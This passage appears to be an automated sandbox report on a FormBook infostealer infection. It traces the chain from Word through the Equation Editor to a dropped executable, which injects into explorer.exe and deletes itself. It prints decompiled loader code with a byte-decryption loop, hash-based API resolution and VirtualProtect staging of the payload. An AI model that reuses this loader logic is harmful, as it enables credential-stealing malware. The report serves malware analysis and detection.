href="https://www.ghelyoun.net/iic6/?Cr24w=dZrXWrr0J06LhDJ&UL0tljxP=LfZLOLN5XSNEI+sCgvR59RXQ9jmNrQ0h0keI8mxtmC8z/BE1pdL/TKWDQE351dcf8yE5vQ==">Moved Permanently</a>.

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEE
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEE
GetMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEE
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEE

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2388 Parent PID: 584

General

Start time:	20:36:42
Start date:	13/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fcb0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2408 Parent PID: 584

General

Start time:	20:36:43
Start date:	13/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mpomboby8423.exe PID: 2516 Parent PID: 2408

General

Start time:	20:36:45
Start date:	13/01/2021
Path:	C:\Users\user\AppData\Roaming\mpomboby8423.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mpomboby8423.exe
Imagebase:	0x12b0000
File size:	333824 bytes
MD5 hash:	06AAFD2382D63AFC9874125E5C1062B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: mpomboby8423.exe PID: 2852 Parent PID: 2516

General

Start time:	20:36:46
Start date:	13/01/2021
Path:	C:\Users\user\AppData\Roaming\mpomboby8423.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mpomboby8423.exe
Imagebase:	0x12b0000
File size:	333824 bytes
MD5 hash:	06AAFD2382D63AFC9874125E5C1062B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2852

General

Start time:	20:36:49
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: help.exe PID: 260 Parent PID: 1388

General

Start time:	20:37:01
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\help.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\help.exe
Imagebase:	0x310000
File size:	8704 bytes
MD5 hash:	0F488C73AA50C2FC1361F19E8FC19926
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2820 Parent PID: 584

General

Start time:	20:37:03
Start date:	13/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2984 Parent PID: 260

General

Start time:	20:37:04
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Roaming\mpomboby8423.exe'
Imagebase:	0x4a3a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: mpomboby8423.exe PID: 2516 Parent PID: 2408 mpomboby8423.exeCOMMON

Executed Functions

Function 012B1040, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 184
librarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E012B1040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _v5;
				struct HBRUSH__* _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _v48;
				void* _v1048;
				void* _v7712;
				void* __ebp;
				void* _t127;
				void* _t128;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t177;

				_t177 = __fp0;
				_t170 = __esi;
				_t169 = __edi;
				_t128 = __ecx;
				E012B8770(0x1e1c);
				_v16 = GetModuleHandleW(L"Kernel32.dll");
				E012B6B80(_t128); // executed
				_v44 = E012B6A70(_v16, 0xb616c5d9);
				_v40 = E012B6A70(_v16, 0xe0baa99);
				_v32 = E012B6A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
				_v24 = E012B6A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
				_v36 = E012B6A70(_v16, 0x9347c911);
				_v28 = _v36(0, L"IEUCIZEO", 0xa);
				_v20 = _v40(0, _v28);
				E012B7AE0( &_v7712, _v20, 0x1a05);
				_t173 = _t172 + 0xc;
				_v12 = 0;
				while(_v12 < 0x1a05) {
					_v5 =  *((intOrPtr*)(_t171 + _v12 - 0x1e1c));
					_v5 = _v12 + (_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000036;
					_v5 = (_v5 & 0x000000ff) - 1;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x0000003f;
					_v5 = (_v5 & 0x000000ff) + 0x16;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x1f;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) - 0x81;
					_v5 = _v5 & 0x000000ff ^ 0x000000e8;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					 *((char*)(_t171 + _v12 - 0x1e1c)) = _v5;
					_v12 =  &(_v12->i);
				}
				VirtualProtect( &_v7712, 0x1a05, 0x40,  &_v48);
				GrayStringW(_v24(0), 0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0);
				E012B21E0( &_v7712, _t169, _t170, __eflags);
				while(1) {
					E012B1380(_t169, _t170, __eflags, 8, 9, 0x46, 0xd);
					E012B12B0(0xa, 0xb);
					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
					E012B715C(_t127, _t169, _t170, __eflags);
					_t173 = _t173 + 4;
					__eflags = (_v5 & 0x000000ff) - 0x41;
					if((_v5 & 0x000000ff) == 0x41) {
						break;
					}
					__eflags = (_v5 & 0x000000ff) - 0x61;
					if((_v5 & 0x000000ff) != 0x61) {
						__eflags = (_v5 & 0x000000ff) - 0x53;
						if((_v5 & 0x000000ff) == 0x53) {
							L10:
							E012B3610(_t127, _t169, _t170, _t177);
						} else {
							__eflags = (_v5 & 0x000000ff) - 0x73;
							if((_v5 & 0x000000ff) != 0x73) {
								__eflags = (_v5 & 0x000000ff) - 0x1b;
								if((_v5 & 0x000000ff) == 0x1b) {
									E012B77B1(0);
								}
								__eflags = 1;
								if(1 != 0) {
									continue;
								}
							} else {
								goto L10;
							}
						}
					} else {
						break;
					}
					L14:
					__eflags = 0;
					return 0;
				}
				E012B22F0(_t169, _t170, _t177);
				goto L14;
			}

0x012b1040
0x012b1040
0x012b1040
0x012b1040
0x012b1048
0x012b1058
0x012b105b
0x012b106e
0x012b107f
0x012b1098
0x012b10b1
0x012b10c2
0x012b10d1
0x012b10dd
0x012b10f0
0x012b10f5
0x012b10f8
0x012b110a
0x012b1121
0x012b112b
0x012b1134
0x012b113e
0x012b1148
0x012b1151
0x012b115b
0x012b1165
0x012b116e
0x012b1178
0x012b1181
0x012b118b
0x012b119d
0x012b11aa
0x012b11b7
0x012b11c1
0x012b11ca
0x012b11dc
0x012b11e5
0x012b1107
0x012b1107
0x012b1203
0x012b1226
0x012b1229
0x012b122e
0x012b1236
0x012b123f
0x012b1244
0x012b1249
0x012b124e
0x012b1255
0x012b1258
0x00000000
0x00000000
0x012b125e
0x012b1261
0x012b126e
0x012b1271
0x012b127c
0x012b127c
0x012b1273
0x012b1277
0x012b127a
0x012b1287
0x012b128a
0x012b128e
0x012b128e
0x012b1298
0x012b129a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012b127a
0x00000000
0x00000000
0x00000000
0x012b129c
0x012b129c
0x012b12a1
0x012b12a1
0x012b1263
0x00000000

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,?,012B89A2,012B0000,00000000,00000000), ref: 012B1052

Part of subcall function 012B6B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B8C
Part of subcall function 012B6B80: RtlAllocateHeap.NTDLL(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B93
Part of subcall function 012B6B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BCD
Part of subcall function 012B6B80: HeapAlloc.KERNEL32(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BD4

LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,012B89A2,012B0000,00000000,00000000), ref: 012B108C
LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,012B89A2,012B0000,00000000,00000000), ref: 012B10A5
_memmove.LIBCMT ref: 012B10F0
VirtualProtect.KERNELBASE(?,00001A05,00000040,?), ref: 012B1203
GrayStringW.USER32(00000000), ref: 012B1226
_wprintf.LIBCMT ref: 012B1249

Strings

Press A to Log in as ADMINISTRATOR or S to log in as STAFF, xrefs: 012B1244
Kernel32.dll, xrefs: 012B104D
User32.dll, xrefs: 012B1087
IEUCIZEO, xrefs: 012B10C7
User32.dll, xrefs: 012B10A0

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$LibraryLoadProcess$AllocAllocateGrayHandleModuleProtectStringVirtual_memmove_wprintf
String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
API String ID: 1383926253-1224953502
Opcode ID: 8d3ee942c3797b97ae22e11d66a1ef95d8a6754bdc2d4126ecf19215a90fc1ca
Instruction ID: 33db7170ab3bd406604840d22986ef260bcff36b0bb87cd884add83c9276a9cd
Opcode Fuzzy Hash: 8d3ee942c3797b97ae22e11d66a1ef95d8a6754bdc2d4126ecf19215a90fc1ca
Instruction Fuzzy Hash: 6871AEB4D5C2D9BADB01DBF998A07FDBFB09F16341F0480C9E691B6282C575474A8B21

Uniqueness

Uniqueness Score: -1.00%

Function 012B6B80, Relevance: 6.0, APIs: 4, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E012B6B80(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t7;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_t5 = RtlAllocateHeap(GetProcessHeap(), 1, 0x17d78400); // executed
				_v8 = _t5;
				_push(_t5);
				if(_t5 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t7);
				if(_v8 != 0) {
					E012B6C50(_t14, _v8, 0x17d78400);
					_push(_t11);
					asm("cld");
					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
				}
				return _t7;
			}

0x012b6b80
0x012b6b83
0x012b6b93
0x012b6b99
0x012b6b9c
0x012b6ba0
0x012b6ba4
0x012b6ba5
0x012b6ba9
0x012b6baa
0x012b6baf
0x012b6bbd
0x012b6bc2
0x012b6bc7
0x012b6bd4
0x012b6bd4
0x012b6bde

APIs

GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B8C
RtlAllocateHeap.NTDLL(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6B93
GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BCD
HeapAlloc.KERNEL32(00000000,?,?,012B1060,?,012B89A2,012B0000,00000000,00000000), ref: 012B6BD4

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocAllocate
String ID:
API String ID: 1154092256-0
Opcode ID: 7c8816d43ad743a092902f9ac3c27bcd628631b341e382187d9150d0ee7660cf
Instruction ID: 76dd7e31ca477d03160ba92925373d1ed5be224755e95d30f5fb3b90b25a452d
Opcode Fuzzy Hash: 7c8816d43ad743a092902f9ac3c27bcd628631b341e382187d9150d0ee7660cf
Instruction Fuzzy Hash: A5F08271541618BFE71066B8BC4EFEBB7ACE705709F604554F705D3240D5725A048760

Uniqueness

Uniqueness Score: -1.00%

Function 012B88A7, Relevance: 16.6, APIs: 11, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 91%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t28;
				signed int _t38;
				void* _t40;
				void* _t46;
				signed int _t49;
				void* _t51;
				void* _t53;
				void* _t60;

				_t60 = __fp0;
				_t47 = __edi;
				_t46 = __edx;
				E012BFC48();
				_push(0x14);
				_push(0x12cd838);
				E012B9160(__ebx, __edi, __esi);
				_t49 = E012BC013() & 0x0000ffff;
				E012BFBFB(2);
				_t53 =  *0x12b0000 - 0x5a4d; // 0x5a4d
				if(_t53 == 0) {
					_t17 =  *0x12b003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t17 + 0x12b0000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0x12b0000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0x12b0018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0x12b0018)) != 0x10b) {
							goto L2;
						} else {
							_t38 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0x12b0074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0x12b0074)) > 0xe) {
								__eflags =  *(_t17 + 0x12b00e8);
								_t6 =  *(_t17 + 0x12b00e8) != 0;
								__eflags = _t6;
								_t38 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t38 = 0;
				}
				 *(_t51 - 0x1c) = _t38;
				if(E012BD058() == 0) {
					E012B89F5(0x1c);
				}
				if(E012BD6D2(_t38, _t47) == 0) {
					_t19 = E012B89F5(0x10);
				}
				E012BBE1F(_t19);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				E012BA5C3();
				 *0x12d4080 = GetCommandLineA(); // executed
				_t23 = E012BFCE2(); // executed
				 *0x12d2284 = _t23;
				_t24 = E012BF8ED();
				_t56 = _t24;
				if(_t24 < 0) {
					E012B751F(_t38, _t46, _t47, _t49, _t56, 8);
				}
				_t25 = E012BFB1A(_t38, _t46, _t47, _t49);
				_t57 = _t25;
				if(_t25 < 0) {
					E012B751F(_t38, _t46, _t47, _t49, _t57, 9);
				}
				_t26 = E012B7559(_t47, _t49, 1);
				_pop(_t40);
				_t58 = _t26;
				if(_t26 != 0) {
					E012B751F(_t38, _t46, _t47, _t49, _t58, _t26);
					_pop(_t40);
				}
				_t28 = E012B1040(_t40, _t47, _t49, _t58, _t60, 0x12b0000, 0, E012BFD6D(), _t49); // executed
				_t50 = _t28;
				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
				if(_t38 == 0) {
					E012B77B1(_t50);
				}
				E012B754A();
				 *(_t51 - 4) = 0xfffffffe;
				return E012B91A5(_t50);
			}

0x012b88a7
0x012b88a7
0x012b88a7
0x012b88a7
0x012b88b1
0x012b88b3
0x012b88b8
0x012b88c2
0x012b88c7
0x012b88d2
0x012b88d9
0x012b88df
0x012b88e4
0x012b88ee
0x00000000
0x012b88f0
0x012b88f5
0x012b88fc
0x00000000
0x012b88fe
0x012b88fe
0x012b8900
0x012b8907
0x012b8909
0x012b890f
0x012b890f
0x012b890f
0x012b890f
0x012b8907
0x012b88fc
0x012b88db
0x012b88db
0x012b88db
0x012b88db
0x012b8912
0x012b891c
0x012b8920
0x012b8925
0x012b892d
0x012b8931
0x012b8936
0x012b8937
0x012b893c
0x012b8940
0x012b894b
0x012b8950
0x012b8955
0x012b895a
0x012b895f
0x012b8961
0x012b8965
0x012b896a
0x012b896b
0x012b8970
0x012b8972
0x012b8976
0x012b897b
0x012b897e
0x012b8983
0x012b8984
0x012b8986
0x012b8989
0x012b898e
0x012b898e
0x012b899d
0x012b89a2
0x012b89a4
0x012b89a9
0x012b89ac
0x012b89ac
0x012b89b1
0x012b89e6
0x012b89f4

APIs

___security_init_cookie.LIBCMT ref: 012B88A7

Part of subcall function 012BC013: GetStartupInfoW.KERNEL32(?), ref: 012BC01D

_fast_error_exit.LIBCMT ref: 012B8920
_fast_error_exit.LIBCMT ref: 012B8931
__RTC_Initialize.LIBCMT ref: 012B8937
__ioinit0.LIBCMT ref: 012B8940
GetCommandLineA.KERNEL32(012CD838,00000014), ref: 012B8945
___crtGetEnvironmentStringsA.LIBCMT ref: 012B8950
__setargv.LIBCMT ref: 012B895A
__setenvp.LIBCMT ref: 012B896B
__cinit.LIBCMT ref: 012B897E
__wincmdln.LIBCMT ref: 012B898F

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
String ID:
API String ID: 1504447550-0
Opcode ID: a9651625be412c0432d1d054dc67cfcd45ad546c26b1e36cb6c51f88cb446eb0
Instruction ID: 8f0b1312b1d43878eb4b03472a2c5b72e539268eeaea1b83e7570194c2e6379a
Opcode Fuzzy Hash: a9651625be412c0432d1d054dc67cfcd45ad546c26b1e36cb6c51f88cb446eb0
Instruction Fuzzy Hash: 1C21C730A347479AEF217BB4A9C8BFA21685F607C5F104429EB0C9A1C1EFB489849356

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012BC0A3, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BC0A3(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x012bc0a8
0x012bc0b8

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 012BC0A8
UnhandledExceptionFilter.KERNEL32(?), ref: 012BC0B1

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5bbb683b8995e3f4f873a6f2eb945130b184f9f04f6e8e3f817a3a13d87727dd
Instruction ID: b03858ef57305f89935faaddcee3a544efb5e9006a8dc0622c7767c963234813
Opcode Fuzzy Hash: 5bbb683b8995e3f4f873a6f2eb945130b184f9f04f6e8e3f817a3a13d87727dd
Instruction Fuzzy Hash: 00B09231044208EFCB102B91FC0EB587F68EB44692F01C010F70D440559BB254108BA5

Uniqueness

Uniqueness Score: -1.00%

Function 012BD929, Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b313525b04f8881b3dcfe61b75d5eab80e1ce3ce6d6d524c76fe76189b64382
Instruction ID: bece5d759133b1c5dff12a951895c2c4142ff8e627a2b1ea512833eaabd4b913
Opcode Fuzzy Hash: 0b313525b04f8881b3dcfe61b75d5eab80e1ce3ce6d6d524c76fe76189b64382
Instruction Fuzzy Hash: F8323532D39F014DD7239939D86A3B5A64CAFB73C4F15D727E91AB5D9AEB28C4834200

Uniqueness

Uniqueness Score: -1.00%

Function 012BC080, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BC080(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x012bc08d

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 012BC086

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 960d05cfa38fe4b0e3f9ce722b283c91a2856cbf0b87041123ff97f68c6a4351
Instruction ID: 447a69acbafbf1d9f3b273593a82d4f36cf804480da43ec2baf747b94dcd2a98
Opcode Fuzzy Hash: 960d05cfa38fe4b0e3f9ce722b283c91a2856cbf0b87041123ff97f68c6a4351
Instruction Fuzzy Hash: 3CA0223000020CFFCF002F82FC0C8883FACFB802A0B008020FA0C00020CBB3A8208BC0

Uniqueness

Uniqueness Score: -1.00%

Function 0046F651, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2104314311.000000000046D000.00000040.00000001.sdmp, Offset: 0046D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
Instruction ID: c08d72e5fd15b4eecc0147d4171955501e2f59af4977ce1605ca2070b6ff34e5
